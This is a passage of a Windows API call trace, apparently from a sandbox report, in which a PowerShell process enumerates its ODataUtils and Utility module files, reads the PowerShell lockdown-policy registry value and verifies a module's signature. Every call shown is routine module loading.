dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0227.942] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0227.943] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0227.943] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0227.943] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0227.943] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 0 [0227.943] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0ed0 [0227.943] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataAdapter.ps1", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psd1", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils.psm1", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsHelper.ps1", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1fa9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataV4Adapter.ps1", cAlternateFileName="")) returned 1 [0227.944] FindNextFileW (in: hFindFile=0x25b73cd0ed0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.944] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0cf0 [0227.945] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.945] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 1 [0227.945] FindNextFileW (in: hFindFile=0x25b73cd0cf0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9abb71ce, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9abb71ce, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9abb71ce, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x2e5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtilsStrings.psd1", cAlternateFileName="")) returned 0 [0227.945] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1cb0 [0227.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0227.960] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d9460 [0227.960] GetSystemDirectoryW (in: lpBuffer=0x25b739d9460, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0227.960] CoTaskMemFree (pv=0x25b739d9460) [0227.960] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0227.960] WldpGetLockdownPolicy () returned 0x0 [0227.960] GetSystemInfo (in: lpSystemInfo=0x653ef8d500 | out: lpSystemInfo=0x653ef8d500*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0227.960] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d408 | out: phkResult=0x653ef8d408*=0x804) returned 0x0 [0227.960] RegQueryValueExW (in: hKey=0x804, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8d458, lpData=0x0, lpcbData=0x653ef8d450*=0x0 | out: lpType=0x653ef8d458*=0x0, lpData=0x0, lpcbData=0x653ef8d450*=0x0) returned 0x2 [0227.960] RegCloseKey (hKey=0x804) returned 0x0 [0227.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0227.966] CoTaskMemAlloc (cb=0x20c) returned 0x25b739d8be0 [0227.966] GetSystemDirectoryW (in: lpBuffer=0x25b739d8be0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0227.966] CoTaskMemFree (pv=0x25b739d8be0) [0227.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x653ef8cdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0227.966] WldpGetLockdownPolicy () returned 0x0 [0227.966] GetSystemInfo (in: lpSystemInfo=0x653ef8d360 | out: lpSystemInfo=0x653ef8d360*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0227.967] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8d268 | out: phkResult=0x653ef8d268*=0x7c4) returned 0x0 [0227.967] RegQueryValueExW (in: hKey=0x7c4, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x653ef8d2b8, lpData=0x0, lpcbData=0x653ef8d2b0*=0x0 | out: lpType=0x653ef8d2b8*=0x0, lpData=0x0, lpcbData=0x653ef8d2b0*=0x0) returned 0x2 [0227.967] RegCloseKey (hKey=0x7c4) returned 0x0 [0227.967] CloseHandle (hObject=0x804) returned 1 [0227.967] CoCreateGuid (in: pguid=0x653ef8d418 | out: pguid=0x653ef8d418*(Data1=0x28251ea6, Data2=0x94ea, Data3=0x427a, Data4=([0]=0x80, [1]=0xc5, [2]=0x4d, [3]=0xa3, [4]=0x5f, [5]=0x79, [6]=0x41, [7]=0xe4))) returned 0x0 [0228.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0228.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cde0) returned 1 [0228.023] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cec0 | out: lpFileInformation=0x653ef8cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0228.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cda0) returned 1 [0228.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0228.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0228.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ccc0) returned 1 [0228.023] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cda0 | out: lpFileInformation=0x653ef8cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0228.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cc80) returned 1 [0228.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0228.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cc50) returned 1 [0228.024] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x804 [0228.025] GetFileType (hFile=0x804) returned 0x1 [0228.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cbc0) returned 1 [0228.025] GetFileType (hFile=0x804) returned 0x1 [0228.025] WTGetSignatureInfo () returned 0x0 [0228.180] CertDuplicateCertificateContext (pCertContext=0x25b73bb8c90) returned 0x25b73bb8c90 [0228.180] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x653ef8cce8 | out: phkResult=0x653ef8cce8*=0x820) returned 0x0 [0228.181] RegQueryValueExW (in: hKey=0x820, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8cd38, lpData=0x0, lpcbData=0x653ef8cd30*=0x0 | out: lpType=0x653ef8cd38*=0x1, lpData=0x0, lpcbData=0x653ef8cd30*=0x56) returned 0x0 [0228.181] RegQueryValueExW (in: hKey=0x820, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x653ef8cd38, lpData=0x25b5be75d38, lpcbData=0x653ef8cd30*=0x56 | out: lpType=0x653ef8cd38*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x653ef8cd30*=0x56) returned 0x0 [0228.181] RegCloseKey (hKey=0x820) returned 0x0 [0228.181] CoTaskMemAlloc (cb=0x10) returned 0x25b73b93660 [0228.181] CoTaskMemAlloc (cb=0x50) returned 0x25b73cd1950 [0228.181] WinVerifyTrust () returned 0x0 [0228.182] CoTaskMemFree (pv=0x25b73cd1950) [0228.182] CoTaskMemFree (pv=0x25b73b93660) [0228.182] CertFreeCertificateContext (pCertContext=0x25b73bb8c90) returned 1 [0228.182] CloseHandle (hObject=0x804) returned 1 [0228.195] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0228.195] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0228.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0228.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x105, lpBuffer=0x653ef8bfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0228.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0x653ef8bfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0228.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c430) returned 1 [0228.250] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c510 | out: lpFileInformation=0x653ef8c510*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.250] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c3f0) returned 1 [0228.253] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0228.253] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0228.254] CoTaskMemAlloc (cb=0x20e) returned 0x25b739d89c0 [0228.254] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x25b739d89c0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0228.254] CoTaskMemFree (pv=0x25b739d89c0) [0228.254] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8bda0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0228.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c1f0) returned 1 [0228.254] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x653ef8c2d0 | out: lpFileInformation=0x653ef8c2d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0228.254] SetThreadErrorMode (dwNewMode=0x0, 